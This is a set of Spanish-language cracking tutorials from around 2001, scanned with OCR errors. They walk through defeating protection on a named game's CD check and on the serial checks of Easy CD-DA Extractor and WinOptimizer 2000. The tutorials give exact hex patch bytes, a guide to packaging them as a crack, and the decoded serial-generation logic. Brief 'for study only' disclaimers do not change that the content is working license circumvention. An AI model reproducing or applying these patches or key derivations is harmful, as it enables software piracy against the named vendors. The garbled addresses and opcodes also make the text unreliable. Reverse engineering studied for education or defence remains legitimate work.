:005E039B 0F34A8000000 je 005E0449 


Donde en la call se hace el chekeo compara y si todo va bien no salta.[Se comprueba con el Soft-ICE] , mas adelante podemos ver k si este 
salto no se produce, hay un salto incondicional k nos lleva lejos de la parte del código donde nos da el mensaje de error: 


:005E0444 E9E0000000 ¡mp 005E0529 
Hey la cosa está clara podemos nopear el salto de la dirección 5E0398 para k no nos conduzca al error nunca. 


Vemos una cosa, al parchearlo, jod... solo sirve para una vez cuando lo instalamos de nuevo debemos parchearlo otra vez y tal y tal....., 


pues aki nada el programador ha cometido un fallo muy grande, ya k al parchearlo, y aceptar cualquier serial, vamos otra vez la 


pestaña de registro y..., leches!! (con perdón) un serial correcto!!! ;- ) 


Nota:Esto es para el estudio de la protección del programa, y solo eso , si os gusta o acabais el periodo de evaluación debereis pagar 


para seguirlo usando. 


Un saludo a todos los de Tutoriales-2000, al canal Hcrackers del irc-hispano, bueno y a todos en GENERAL.. 


Para consultas: kamui_ Olatinmail.com/o tambien/kamui__ hotmail.com 
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Karpoff Spanish Tutor 


PROTECCIÓN: CD-check 
Objetivo: Eliminar el CD-check 
[Descripción: | Muy buen juego de estrategia en tiempo real 


* HexWorkShop 


* SoftICE 4.x * CodeFusion 
3.0 


INTRODUCCIÓN 


Bueno este es mi primer tutorial y mi primer crack y he elegido este programa por que 
tiene una rutina muy fácil tanto de encontrar como de cargarse. De Todas formas para 
cualquier duda podéis mandarme un e-mail 


Herramientas: 


AL ATAKE 


Bueno, bueno, bueno el juego tiene una estúpida forma de mirar a ver si esta el CD en la unidad. Lo que hace es un par de 
comparaciones y si las comparaciones no le cuadran entonces nos hace aparecer un mensajito de esos de Windows diciendo que 
introduzcamos el CD. Bueno pues veamos una forma de lo mas sencilla para saltarnos el mensajito. 


Bueno el mensaje es un claro MessageBox de Windows y su breakpoint correspondiente es "Bpx MessageBoxA". 
Colocamos el breakpoint y ejecutamos el juego y cuando nos salga el mensaje nuestro fiel Soft-ice saltara... 


En fin pensemos un poco ¿que es lo que hace aparecer el mensajito? Premio!!!! una comprobación y un salto condicional, y ¿Donde 
estará ese salto? Pues simple; unas líneas mas arriba de la llamada al mensaje. 


Así pues buscando unas líneas mas arriba observaremos........ 
:00526B3E E817A5EDFF CALL 0040105A 


:00526B43 6880027503 PUSH 03750280 


:00526B48 687CE25500 PUSH 0055E27C 


:00526B4D E852ABEDFF CALL 00401644 <=====----- Comprueba que hay CD. 


:00526B52 83C408 ADD ESP, 08 

:00526B55 85C0 TEST EAX, EAX 

:00526B57 7409 JZ 00526B62 — <o=====------ Salta si no hay CD 
:00526B59 E802B8EDFF CALL 0040230 <====------ Comprueba el CD 
:00526B5E 85C0 TEST EAX, EAX 

:00526B60 754F JNZ  00526BB1  <=====----- Salta si es correcto 


:00526B90 FF15AC879300 [USER32!MessageBoxA] <-----Mensaje de Error 


Incluso para un novato como yo esta claro, la primera call comprueba que haya algún CD y sino hay ninguno salta y nos jode la 
marrana. 


La segunda con el permiso de la primera comprueba el CD y sino es el correcto pues te jodes y pagas 6900 pelas por este juego (las 
vale). 


Pues sabiendo esto y utilizando eso que tienes sobre los hombros pues deduces: 


Si hago que el primer salto no salte nunca no me jodera la marrana. Y si hago que el segundo salte siempre pues podré jugar hasta 
hartarme. 


¿Qué como haces eso? Muy simple... 


El primer salto lo cambias por un par de nop's así el ordenador no hace nada y el segundo lo cambias para que en vez de condicional 
sea incondicional Así que coges un editor hexadecimal y haces los cambios pero no sin antes hacer una copia de seguridad... 


0125F57: 74 09 ------- > 90 90 
0125F60: 75 4F ------- > EB 4F 


Y ya para finalizar coges un generador de cracks (CodeFusion) y tomas como original la copia de seguridad y como crackeado el que 
has modificado y creas un bonito crack. 


Y eso es todo verdad que ha sido fácil..... 


Para cualquier duda podéis mandarme un e-mail 


Karpoff Spanish Tutor: Pagina dedicada a la dibulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


EASY CD-DA EXTRACTOR 4.3.0 


Serial Number. 

Pues buscar un Serial válido a la vez que aprendemos algo de criptografía. 
Programa de conversión de CD's de audio a archivos de sonido variados. 
Principiante. 

http://www.poikosoft.com/cdda/ 

Softice 3.24, papel y algo para escribir. 

Arkanian FECHA: 28/03/2001 


INTRODUCCION 


Un nuevo ensayo ( y van ...) en el que vamos a ver como se intenta esconder las cosas, el Serial en este caso, 
sin conseguirlo. De paso veremos algunas técnicas y algunos trucos que nos servirán en el futuro para 
programas de similares características. 


Parece mentira, es el enésimo programa que me encuentro con copyright del año 2000 que funciona como si 
nosotros no existieramos (¿?). Mi opinión es que les da igual mientras haya alguién que pase por caja. 


Bueno, esto no es del todo cierto, el programa parece estar ¿empakado - compilado? con algo que 
FileinsPEctor 4.2-SP1 (aupa Viper) no llega a reconocer y las caracteristicas de las secciones están 
modificadas, pero como vamos a atacar la encriptación del Serial esto no tiene demasiada importancia. 


Eso si, papel y algo para escribir van a ser herramientas fundamentales para este programa. 


Engrasa las neuronas que empezamos... 


AL ATAKE 


PREPARATIVOS 


Al ejecutar el programa observamos que el inicio del mismo tarda lo suyo, esperamos pacientemente y por fin nos 
parece una Ventana de Registro (mira más abajo), con dos partes diferenciadas. Una que nos informa que tenemos un 
Periodo de Evaluación de 20 usos con su botón de ¡Probar! y otra de desbloqueo donde se nos va a pedir una Clave 
y una Clave de comprobación, vemos también que el botón Desbloquear está deshabilitado. 


Vamos a poner 1212121212 como Clave y 1234567890 como Clave de comprobación a ver que pasa... nada, el 
botón sigue deshabilitado. ¿El número de caracteres?, ponemos más caracteres y... nada. ¿Ponemos cualquier cosa?... 
nada que hacer. 


Pensemos un poco, si el botón sigue deshabilitado se puede deber a varias razones. Veamos, en otros programas basta 
con rellenar los campos para que se active el botón, es una comprobación de que el campo está ocupado, una vez que 
se pulsa el botón es cuando se realiza las comprobaciones o lo que sea. 


Este no parece ser el caso, por lo tanto cuando introducimos las Claves el programa tiene que estar haciendo algo. Y 
ese "algo" es alguna otra comprobación, o bien del número de caracteres o bien, y esperemos que sea así, la 
comprobación entera del Serial. El procedimiento puede ser el siguiente: 


-. El usuario introduce las Claves. 

-. Se comprueba lo que sea. 

-. ¿Acierto?, se habilita el botón Desbloquear. 

-. ¿Error?, el programa entra en un bucle esperando una nueva acción del usuario, esta acción puede ser 
o introducir una Clave nueva o darle al botón de ¡Probar!. 


Probaremos un pequeño truco que suele funcionar con programas de estas características. Un ejemplo del esquema 
anterior es el acceso a la zona VIP de los CD's de la revista Primera Linea que se salta también así. 


Metemos de Clave 1212121212 y de Clave de comprobación 123456789, saltamos con Crtl+D a Softlce y hacemos 
lo siguiente: 


S 30:0 LFFFFFFFFFF "1212121212" -> Buscamos... 

Pattern found at 0030:80520A52 (80520A52) -> Respuesta de Softlce. 

BPR 30:80520A52 30:80520A52+A RW -> El lazo de la trampa. 

S -> Por si acaso... 

Pattern found at 0030:COF5B17F (C0F5B17F) -> El eco de la busqueda anterior. 


Una vez puesta la trampa volvemos con Crtl+D al programa y metemos el último digito de nuestro Serial de prueba en 
la Clave de comprobación, en este caso el 0, el resultado es inmediato, adivina donde aterrizamos, ...pues si, 
Kernel!HMEMCPY. 


Atención, en esta fase un bp directo tal como BPX HMEMCPY ¡no funciona!, compruebalo si quieres. 

EL CÓDIGO 

No tiene mucho misterio, sólamente es necesario invertir tres saltos para que el programa quede totalmente registrado, 
uno durante la comprobación que estamos viendo y que es el que habilita el botón, el segundo cuando se pulsa el botón 
Desbloquear que nos manda a un código identico pero en otra dirección y el tercero cuando se inicia el programa y se 
comprueban en HKEY_CURRENT_USERWSoftwarePoikosoftiEasy CD-DA Extractor 4.3 las claves 109 y 110 


que son el Serial, por si te sirve de ayuda los tres van precedidos de un test al, al. ¡Suerte!. 


Pero como saltar el programa sin más no es nuestro objetivo pasaremos elegantemente por encima de estas 
menudencias, vamos a por el Serial válido que es lo que interesa. 


EL SERIAL 


Si has empezado trazando el código desde el principio habrás comprobado como la cosa parece estar divida en tres 


partes, una donde se comprueba la Clave, su número de caracteres y como la posiciona en distintos sitios de memoria 
(acaba en un JMP), otra parte que hace lo mismo con la Clave de comprobación (acaba también en JMP) y la tercera 
que es la que finaliza en el test al, al y el salto condicional. 


Esta es la parte que vamos a analizar. ¿Qué donde coño está escondido el Serial?. Atentos que empieza a asomar las 


orejas: 


:00461A0C push ebp 

:00461A0D mov ebp, esp 

:00461A0F mov eax, [ebp+08] -> Dirección de la Clave de comprobación. 

:00461A12 mov dl, [eax+08] -> El valor del noveno caracter [39]. 

:00461A15 mov al, [eax+09] -> El valor del décimo caracter [30]. 

:00461A18 xor dl, AA -> Los "'xorea'' con AA y 

:00461A1B xor al, AA -> el resultado es 93 y 9A respectivamente. 

:00461A1D movsx ecx, al -> Con esto lo convierte a FFFFFF9A (ver recuadro). 
:00461A20 movsx edx, dl -> Nos queda FFFFFF93, estos valores serán usados más tarde. 
:00461A23 mov eax, ecx -> Lo traslada a EAX. 

:00461A25 push eax -> Guarda el registro. 

:00461A26 push edx -> Idem. 

:00461A27 mov eax, [ebp+0C] -> Dirección de la Clave. 

:00461A2A push eax -> La guarda para luego. 

:00461A2B call 004617A8 -> Entraremos aquí. 

:00461A30 add esp, OC -> Corrige la pila. 

:00461A33 mov eax, 00592A 14 -> La dirección donde se ha creado la Clave de comprobación válida. 
:00461A38 pop ebp -> Recupera ebp y 

:00461A39 ret -> nos vamos. 


No creo que hagan falta muchas más explicaciones, ha cogido los valores noveno y décimo de nuestra Clave de 
comprobación los ha "xoreado" con AA y convertido mediante MOVSX para guardarlos y utilizarlos luego, lo único 
peliagudo es la instrucción MOVSX cuya explicación técnica es la siguiente: 


MOVSX / MOVZX : Carga con extensión de signo o cero. Toma el segundo operando, le extiende 
adecuadamente el signo (o le pone a cero la parte alta) hasta que sea tan grande como el primer operando. Si 
el primer operando es de 16 bits, el segundo sólo puede ser de 8; si el primero es de 32 bits el segundo puede 
ser de 8 ó 16. El primer operando debe ser un registro, el segundo puede ser un registro u operando en 
memoria (nunca inmediato). 


Si no lo entiendes, no te preocupes, hay que darle tiempo al tiempo, no nacemos aprendidos. Creeme cuando te digo 
que se convierten en esos valores. 


Entramos en el call 004617A8 a ver que hay y nos encontramos con un motón de llamadas, subllamadas y saltos atrás, 
donde se comprueba de nuevo la longitud de la Clave y se localizan unas posiciones de memoria (00592A 14 entre 
otras más) hasta que después de un rato localizamos este más que interesante fragmento de código: 


:00461708 push ebp 

:00461709 mov ebp, esp 

:0046170B push ebx 

:0046170C xor eax, eax -> Limpia EAX. 

:0046170E mov ecx, [ebp+08] -> Primer valor de nuestra Clave, [31]. 

:00461711 mov edx, 0056CF58 -> ¡Aquí! 

:00461716 mov ebx, ecx -> Nuestro valor a EBX. 

:00461718 xor bl, AA -> Lo "xorea" con AA. 

:0046171B cmp bl, [edx] -> Lo compara con el valor de EDX. 

:0046171D jz 00461726 -> ¿Son igules?, entonces saltamos, si no son entonces... 
:0046171F inc eax -> Incrementa el contador en EAX. 

:00461720 inc edx -> Siguiente valor de EDX 

:00461721 cmp eax, 1E -> Contador del número de vueltas comprobando los valores de EDX. 
:00461724 jl 00461716 -> Salta hacia arriba. 

:00461726 cmp eax, 1E -> Contador del número de caracteres de la Clave válida. 
:00461729 jnz 00461733 -> Salta hacia la primera parte del algoritmo de transformación. 
:0046172B mov eax, 00000013 -> Un valor fijo indicativo de ¡ERROR!. 

:00461730 pop ebx 

:00461731 pop ebp 

:00461732 ret -> Vuelve a la segunda transformación. 


A ver si consigo explicar de una manera comprensible lo que realmente hace el código de arriba. Coge el primer valor 
de nuestra Clave, traslada a EDX una dirección fija donde hay una serie de valores (nada inteligible en la columna 
ASCID, "xorea" nuestro valor con AA y lo compara con el valor de EDX. Aquí tenemos dos casos: 


1.- Los valores coinciden 


Si alguna comparación es buena saltaremos en jz 00461726 hacia la segunda comparación de EAX con 
1E, como EAX no ha alcanzado todavía ese valor saltaremos a la dirección 00461733 donde se realiza 
una primera y larga transformación de nuestro valor "xoreado". (Es una pasada poner todo el código). 


Acto seguido entramos en una segunda y muchísimo más larga manipulación donde los resultados 
obtenidos de esta primera transformación son sumados, restados, multiplicados, divididos, "xor-ados", 
"ror-ados", "shl-ados", "neg- ados”...etc, con todos los registros, con una multitud de valores fijos y que 
se yo cuantas cosas más. Es bonito ver como cambian todos los registros haciendo una traza automática 


(T 40, por ejemplo). 


En un momento dado, hacia la mitad o así, aparecen los dos valores de antes (FFFFFF93 y FFFFFF9A) 
que son incorporados a esta orgía matemática. Imposible seguirle la pista a todo esto. (Si poner el código 
de la primerá manipulación es una pasada, imagínate esta...) 


2.- Los valores no coinciden 


Si en esta primera comparación no son iguales, aumenta EAX que hace de contador, pero atención a 
esto, EAX hace de contador del número de comparaciones con los valores de EDX. Es decir nuestro 
primer valor "xoreado" va a ser comparado con 30 valores diferentes en EDX. Como nuestro valor 
"xoreado" no sea igual a ninguno de esos valores, que no lo es, EAX llegará a 30 (1E), alcanzaremos la 
segunda comparación con 1E, no saltaremos en 00461729, entonces moverá un valor fijo (0x13h) a 
EAX y date por jodido. 


El ret final nos manda directamente a la segunda transformación donde ese 13 va a ser el valor de inicio 
y pasaremos bastante rato desgastando la tecla F8 para nada, |:-(. 


Y esto sólo con el primer valor de nuestra Clave, la cosa se repite con los otro nueve... paciencia. 
mov edx, 0056CF58 


Parece que nuestro valor se compara con "algo" que hay en esa dirección, veamos que es. Este es un ejemplo de los 
valores que encontramos en EDX: 


FA 98 F0 9E FD 9C E6 9D F9 ES ...hasta 30 valores. 


Si "xorea" nuestro valor con AA y luego lo compara con lo anterior, lógicamente el "xoreo" de estos valores con AA 
nos dará los caracteres válidos de Clave buena, así pues con la ayuda de la calculadora del Windows obtenemos estos 
valores ASCII originales: 


50 32 5A 34 57 36 4C 37 53 42 ...etc. 
Que puestos de una manera legible son: 

P....2...L...4..W...6...L...7...9...B ...etC. 
Hay que tener en cuenta que la posición de estos valores no es estática, lo que hemos visto hasta ahora nos indica que 
la Clave debe tener 30 caracteres de longitud, que necesariamente debe de estar compuesta de los 30 valores anteriores 


y que por lo visto no importa el orden. El código anterior está comprobando si existe ese valor dentro de nuestra 
Clave, no la posición que ocupa. 


Eso nos hace suponer que a ordenaciones diferentes de esos valores tendremos Claves de comprobación diferentes. 
¡Elemental mi querido Watson...! 


Así pues el número de Claves válidas admitidas será el número de Permutaciones de 30, que es igual al factorial de 30. 
(Para los legos, la manera en la que pueden ser ordenados de forma diferente 30 valores). 


En notación matemática el factorial de 30 es, 30! = 30*29*28*....*3*2*1, a mi me sale un número de ¡33 digitos!. 
¿Tantos usuarios esperan tener?, ¿No se han pasado un poco?... Bueno con esto se aseguran que no van a dar la misma 
Clave a dos usuarios diferentes, :-). 


Dejemos de los Grandes Números y vayamos a lo que interesa, tenemos ya una Clave (P2Z4W6L7SB...etc), ¿Qué 
pasa con la Clave de comprobación? 


LA CLAVE DE COMPROBACIÓN 


Hemos puesto la Clave buena (una de ellas) y saltado a Softlce de nuevo. Como ya sabíamos lo que nos espera hemos 
puesto los bp's pertinentes en los sitios adecuados. Estamos aquí, después de toda la orgía matemática y tenemos todos 
los registros ocupados con valores extraños: 


:00461947 mov eax, edi -> El valor de EDI a EAX. 

:00461949 and eax, OOOOFFFF -> Le hace un Y lógico y 
:0046194E push eax -> lo guarda para 

:0046194F call 00461788 -> entrar aquí donde se desencripta. 
:00461954 pop ecx 

:00461955 mov [00592A 14], al -> El primer caracter de la Clave de Comprobación. 
:0046195A sar edi, 02 -> Nueva operación 

:0046195D push edi -> Lo guarda. 

:0046195E call 00461788 -> Lo desencripta. 

:00461963 pop ecx 

:00461964 mov [00592A15], al -> El segundo caracter. 


El código se repite más o menos igual tomando los valores de los diferentes registros, los manipula y entra en el call 
00461788 para desencriptarlos, el resultado lo traslada a la dirección 00592A 14, 00592A 15, 00592A16, etc... Una 
dirección que ya habiamos visto antes. ¿Como los desencripta?, de la siguiente manera: 


:00461788 push ebp 

:00461789 mov ebp, esp 

:0046178B xor edx, edx -> Limpia EDX. 

:0046178D mov ecx, [ebp+08] -> El valor correspondiente 
:00461790 mov eax, ecx -> aEAX. 

:00461792 mov ecx, OO00001E -> ¡Joder con el dichoso 1E!. 
:00461797 div ecx -> Divide EAX, el resto va a EDX. 
:00461799 mov ecx, edx -> El resto a ECX. 

:0046179B mov al, [ecx+0056CF58] -> Seleciona el valor correspondiente de la Tabla de antes. 
:004617A1 xor al, AA ->¡Alehop!, vuelta a su estado original. 
:004617A3 pop ebp 

:004617A4 ret 


Por lo visto los valores de la Clave de comprobación también vienen definidos por las valores existentes en la 
dirección 0OS6CFES58. Esto lo hace con los ocho primeros caracteres, ¿Ocho?, ¿Cuantos son?. 


Sencillo si sigues el código veras que la instrucción mov [00592A1X], al, se repite con las direcciones que van desde 
00592A 14 hasta 00592A1D, una sencilla resta nos dará el número de caracteres de la Clave de comprobación. 
(0059NAIE - 00592A 14 = A; diez caracteres). 


Ocho, ¿y el resto?, pues un poco más abajo encontramos esto: 


:004619DD mov cl, [ebp+0C] -> Nuestro noveno caracter ''xoreado", ¿te acuerdas?, era [93]. 
:004619E0 push ecx 
:004619E1 call 0046175C -> Comparaciones y ''xoreo'' con AA. 


:004619E5 mov [00592A1C], al -> A su sitio. 
:004619EA mov al, [ebp+10] -> El décimo, [9A], con el que hace lo mismo. 


Abreviando porque esto ya se esta haciendo pesado. Coge nuestro noveno y décimo caracter "xoreado", nos metemos 
en el call 0046175C que tiene un código identico al de las dos cmp eax, 1E y hace de nuevo todo el proceso con la 
Tabla de 0OS6CFS58. Si los encuentra, los vuelve a su estado original con otro xor AA y los planta en su sitio, 
00592A1C y 00592A 1D. 


En resumidas cuentas los dos últimos caracteres también deben estar dentro de la Tabla famosa. Y todo esto lo vemos 
comodamente haciendo un DEX 3 592A 14 y dandole caña al F10. 


Seguidamente vienen las rutinas de comparación con nuestra Clave de comprobación de prueba, etc, etc. 
RESUMEN HASTA AHORA 


La Clave se compone de 30 caracteres que se encuentran "ocultos" en la dirección 0OS6CF58, para volverlos a sus 
valores originales basta "xorearlos" con AA. 


La Clave de comprobación se compone de 10 caracteres. Ocho de los cuales son el resultado de la manipulación de 
los 30 caracteres de la Clave junto con los dos caracteres restantes de esta Clave de Comprobación. Los dos últimos 
son dos caracteres cualquiera que formen parte de la Clave. 


Esta Clave de comprobación se encuentra en la dirección 00592A 14. 


Tanto rollo, resumido en media docena de lineas, para habilitar un puto botón. Este es el resultado: 


Easy CD-DA Extractor 


Easy CD-DA Extractor es SHAREWARE, lo que significa que puedes 
probar el software antes de comprarlo. Si te gusta el software y quieres 
seguir usándolo, por favor cómpralo. 


Periodo de Evaluación: 17 Usos 


LORENA 
Comprar Easy CD-DA Extractor ¡Probarl | 
TDesbloquear 


Los usuarios Registrados deben renombrar su código de registro a: 
http: 44. polkosoft comtcdda*download. html 
Clave: 

Aquí vas a encontrar lo que yo te diga, 


Clave de comprobación: 
Página del Easy CD-DA Extractor 51 quieres peces, mojate el culo... 


Hemos empezado con un Periodo de Evaluación de 20 usos y hemos conseguido desbloquear el programa en tres 
intentos. ¡Cada vez lo hacemos mejor!. 


DESBLOQUEAMOS 


Esto ya es por masoquismo, antes de darle al botón hacemos un Crtl+D, limpiamos los bp's y metemos directamente un 
BPX HMEMCPY a ver que pasa. Esta vez si que funciona. 


Saltamos y vemos que el programa vuelve a realizar TODO el proceso, esta vez en una dirección diferente, perdona 
que no la ponga pero no te puedes imaginar el desbarajuste de notas que tengo encima de la mesa, no se donde puñetas 
he metido esta parte. Así que te lo cuento de memoria. 


Una vez comprobado todo de nuevo se crean dos nuevas claves en el Registro de Windows, bajo la rama 
HKEY_CURRENT-_ etc. (la he puesto arriba) de Nombre 109 y 110 cuyos Datos son la Clave y la Clave de 
comprobación. ¡Ya tenemos el programa registrado!. 


Easy CD-DA Extractor 3 


El programa está ahora desbloqueado y totalmente operativo. Gracias por usar 
nuestra software. 


De nada :-))) 


FINALIZANDO 


Solo queda desinstalar el programa y eliminar los datos anteriores del Registro con cualquier utilidad adecuada para 
ello. Yo uso RegCleaner que funciona muy bien y es gratis. 


Como siempre, ruegos y preguntas sobre el tema a: 


arkanian O mailcity.com 


Saludos y hasta otra. 
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Karpoff Spanish Tutor 


WINOPTIMIZER 2000 vl1.02. 


Serial Number. 

Buscar un Serial válido, por supuesto. 

Programa para limpiar el Registro, buscar archivos inútiles, etc... 
Principiante. 


http://www.ashampoo.com 


Softice 3.24, papel y algo para escribir. 
Arkanian FECHA: 20/03/2001 


INTRODUCCION 


Un estupendo programa para dejar nuestra máquina limpia de cualquier cosa inútil que haya quedado después 
de instalar (y desinstalar) tropecientos programas de shareware. El programa funciona en 95, 98, ME, NT y 
2000 y viene realmente completo en cuanto a opciones y funciones, es intuitivo, facil de usar, tiene una 
cuidada presentación y un esmerado diseño. Enhorabuena... 


La única pega es, como casi siempre, la seguridad. El programa viene "tal cual”, ni empakado, ni encriptado, 
ni anti-debugger, ni anti-nada, nada de nada, vamos una perita en dulce. Estamos en el siglo XXI ¿verdad?. 


Aprovecharemos la oportunidad que nos brindan los programadores de la casa Ashampoo GmbH Co. KG 
con su "Chief Developer" a la cabeza, cuyo nombre aparece en varios sitios del programa, para echarle un 
vistazo a la forma de obtener un Número de Serie válido para desbloquear las limitaciones de la versión 


Shareware. 


Como curiosidad, la forma en la que se genera y se comprueba el Número de Serie de este programa es 
similar a la que utiliza Softlce para comprobar el suyo durante la instalación. 


AL ATAKE 


INSTALANDO 
Durante la instalación el propio programa nos avisa de las limitaciones del mismo: 


-. La opción Select all está desactivada. 

-. Solo se pueden seleccionar tres registros a eliminar. 

-. La version shareware tiene un gigantesco y molestísimo banner publicitario que cambia cada pocos 
segundos. 


Una vez finalizada la instalación, ejecutamos el programa y vamos a Internet / Support « Info y de ahí seleccionamos 
la opción Enter Reg / Trial Key. 


Esto requiere una pequeña explicación, consultando la ayuda averiguamos que por lo visto existen dos tipos de Serial, 
un primer tipo que podemos denominar "de prueba" en la que se desbloquean las dos primeras limitaciones pero el 
maldito banner continua en su sitio y un segundo tipo "de Registro Total" que desbloquea totalmente el programa y 
hace desaparecer el jodido banner. Vamos a por el segundo que es el que interesa. 


PRIMERA PRUEBA 


Estamos en la Ventana de Registro, acojona ¿eh?, ¡vaya pedazo de sitio que tenemos para meter el Serial!. Tranquilos, 
no hay que fiarse de las apariencias, es todo pura fachada. Introducimos un Serial de prueba de 10 caracteres, algo que 
sea fácil de buscar luego, como por ejemplo 1212121212, ;-) 


Crtl+D para saltar a Softlce, asignamos las ventanas como siempre (DEX 0 EAX, DEX 1 ES:EDI DEX 2 DS:ESJD) e 
iniciamos la busqueda de nuestro número de prueba mediante: 


S 30:0 LFFFFFFFFFF "1212121212" -> Buscando.... 

Pattern found at 0030:8063B9D2 (8063B9D2) -> Respuesta de Softlce. 

S -> Otra vez por si acaso... 

Pattern found at 0030:COF4EEA2 (COF4EEA2) -> Ok, el eco de la busqueda. 


Solo una localización y por encima de la posición 80000000 (¿habeis leido los tutoriales de +ORC?), ponemos un 
break point en ese rango de memoria: 


BPR 30:3063B9D2 30:5063B9D2+A RW 


Es decir queremos que se interrumpa la ejecución del programa cuando se lea o se escriba (parámetros RW) en la 
posición de memoria ocupada por nuestro Serial de prueba. Como el Serial tiene 10 caracteres tenemos que especificar 
también el rango que ocupa, que va desde la posición encontrada en la busqueda hasta 10 posiciones mas, de ahí el +A 
(10 decimal = A hexadecimal). 


Crtl+D y volvemos al programa, hacemos click en Register y saltamos a Softlce, ¿donde?, adivina... en el estupendo y 
casi infalible Kernel!HMEMCPY, (estoy trabajando con Win98), bien ya hemos encontrado la función que hace 
saltar a Softlce, tomemos las notas adecuadas para los intentos posteriores. ¿No pensarás que esto sale a la primera, 
verdad? 


F12 hasta salir al programa en WINOPTIMIZER2000:CODE+00026469, de ahí F10 pasando por varios ret y un bucle que 
menea al Serial de arriba abajo durante un rato, por fin llegamos aquí: 


:00465323 8B45FC mov eax, dword ptr [ebp-04] (**) 

:00465326 ESD9F6FFFF call 00464A04 - > Aquí se genera el Serial. 
:0046532B F7D8 neg eax 

:0046532D 1BDB sbb ebx, ebx 

:0046532F F7DB neg ebx 

:00465331 84DB test bl, bl -> Vaya, vaya... 

:00465333 754A ¡ne 0046537F -> El salto crucial... 

:00465335 6A00 push 00000000 

:00465337 8D55FO lea edx, dword ptr [ebp-10] 


(*) El código está tomado de W32dsm89 


Parece ser que todo se realiza en el call 00464A04 así que vamos a entrar a ver que encontramos. Para abreviar y no 
quedar empantanados en un follón de llamadas, subllamadas, saltos atras y demás, iré directamente al grano. Entramos 
con F8 y avanzamos con F10 hasta aquí: 


:00464A53 8D45FC lea eax, dword ptr [ebp-04] -> Longitud del Serial, 0ÓxAh en nuestro caso. 
:00464A56 E875FOF9FF call 00403ADO0 -> Aquí se comprueba que no sea 0. 

:00464A5B 8B45FC mov eax, dword ptr [ebp-04] -> La longitud del Serial en EAX, 
:00464A 63 83F812 cmp eax, 00000012 -> Comprobación del número de caracteres. 
:00464A66 0F3540020000 jne 00464CAC -> Nos manda fuera... 

:00464A6C 8B45FC mov eax, dword ptr [ebp-04] 

:00464A6F E8C4020000 call 00464D38 


Bueno, ya tenemos algo en claro, el Serial tiene 0x12h carateres de largo, en decimal 18. Aquí comprobamos también 
que nos sobra más de la mitad del espacio de la ventana de registro. Tanto espacio está puesto para acojonarnos y 
hacernos creer que el Serial es largo y complicado. 


OTRA PRUEBA 


Limpiamos el bp de antes mediante un BC * y aprovechamos para poner otro haciendo doble click en la instrucción 
:00464A63 cmp eax, 00000012, salimos y ponemos otro Serial de prueba esta vez con 18 caracteres, algo así como 
1234567890ABCDEFGH, como ya tenemos el bp puesto en la instrucción que compara el número de caracteres del 
Serial, volvemos a aterrizar allí cuando salte SoftIce. 


Veamos lo que sigue: 


:00464A63 83F812 cmp eax , 00000012 -> Volvemos a estar aquí. 

:00464A66 0F8540020000 jne 00464CAC -> Esta vez no... 

:00464A6C 8B45FC mov eax, dword ptr [ebp-04] -> EAX=12, el número de caracteres de nuevo. 
:00464A6F E8C4020000 call 00464D38 -> Entramos a esta llamada... 


CALL 00464D38 
Entramos en el call 00464D38, seguimos con F10 y al rato encontramos el siguiente bucle: 


:00464D5D 8B4DFC mov ecx, dword ptr [ebp-04] -> Dirección del Serial de prueba. 
:00464D60 48 dec eax -> EAX hace de contador, ojo que empieza con 1. 

:00464D61 3B41FC cmp eax, dword ptr [ecx-04] -> Número de caracteres del Serial. 
:00464D64 7205 jb 00464D6B -> ¿Es menor?, entonces saltamos... 

:00464D65 ESFDDFF9FF call 00402D68 

:00464D6B 40 inc eax -> Aquí, EAX vuelve a ser 1. 

:00464D6C 8A4C01FF mov cl, [ecx+eax-01] -> Posición del carater a manipular. 
:00464D70 0FB7D2 movzx edx, dx -> Amplia DX a EDX. 

:00464D73 81E1FF000000 and ecx, 0OOO000FF -> Deja en ECX el valor hex del caracter. 
:00464D79 03D1 add edx, ecx -> Lo suma a EDX. 

:00464D7B 7105 jno 00464D82 -> Saltando a... 

:00464D7D ESEEDFF9FF call 00402D70 

:00464D82 8 | FAFFFFOOOO cmp edx, OOOOFFFF -> Esta comparación de control. 
:00464D88 7605 jbe 00464D8F -> Saltamos de nuevo... 

:00464D8A ESD9DFF9FF call 00402D68 

:00464D8F 40 inc eax -> Aquí, donde se incrementa el contador. 

:00464D90 83F80E cmp eax, OE -> ¿14 caracteres?, ¡lo tenemos! :-))) 

:00464D93 75C8 jnz 00464D5D -> Volvemos arriba. 


Parece que vamos avanzando y ya sabemos algo más. El código coge los valores de los 13 primeros caracteres de 
nuestro Serial de prueba y los suma uno por uno, acumulando el resultado en EDX (14-1 = 13 caracteres, atención con 
EAX que empieza de 1). Lo que está haciendo realmente es la siguiente suma hexadecimal 


314+32+334+34+35+4+36+37+38+394+30+41+42+43 = 2D3 -> Valor final de EDX. 


Tomamos las oportunas notas y seguimos avanzando. El programa se lia a continuación en un espantoso follón donde 
ese valor (2D3) es llevado de aquí para alla, realizando innumerables comparaciones para al final acabar poniendole un 
O delante y dejarlo convertido en 02D3, (como 15 minutos trazando código). Este es el valor de EAX después del 
retorno del call 00464D38. |:-( 


LAS COMPARACIONES 


Bueno, pues en algún sitio tendrá que comparar esto ¿no?, efectivamente, después de otro montón de vueltas arriba y 
abajo, encontramos este código más que sospechoso: 


:00464C01 8B45F8 mov eax, dword ptr [ebp-08] -> En EAX está la dirección de 02D3. 
:00464C04 8B55F4 mov edx, dword ptr [ebp-0C] -> En EDX la dirección de EFGH. 

:00464C07 ESB8F1F9FFE call 00403DC4 -> Aquí dentro se realiza la comparación. 

:00464C0C 7504 jne 00464C12 -> EAX tiene que ser 0. 

:00464C0E C645F301 mov [ebp-0C], 01-> Planta un 1, esto será comprobado luego. 

:00464C12 8D45F8 lea eax, dword ptr [ebp-08] -> La dirección del Serial. 

:00464C15 50 push eax -> Guardala. 

:00464C16 B903000000 mov ecx, 00000003 -> Prepara los contadores para la 

:00464C1B BA01000000 mov edx, 00000001-> siguiente comparación dentro de call 00403DC4. 
:00464C20 8B45FC mov eax, dword ptr [ebp-04] -> Número de caracteres del Serial. 

:00464C23 E890F2FOFF call 00403EB8 -> Se manipula el Serial y coge los 3 primeros caracteres. 
:00464C28 8B45F8 mov eax, dword ptr [ebp-08] -> En EAX la dirección de 123, 

:00464C2B BA1C4D4600 mov edx, 00464D1C -> La dirección de un valor fijo. 

:00464C30 ESSFEFLF9EFF call 00403DC4 -> Otra comparación aquí dentro. 

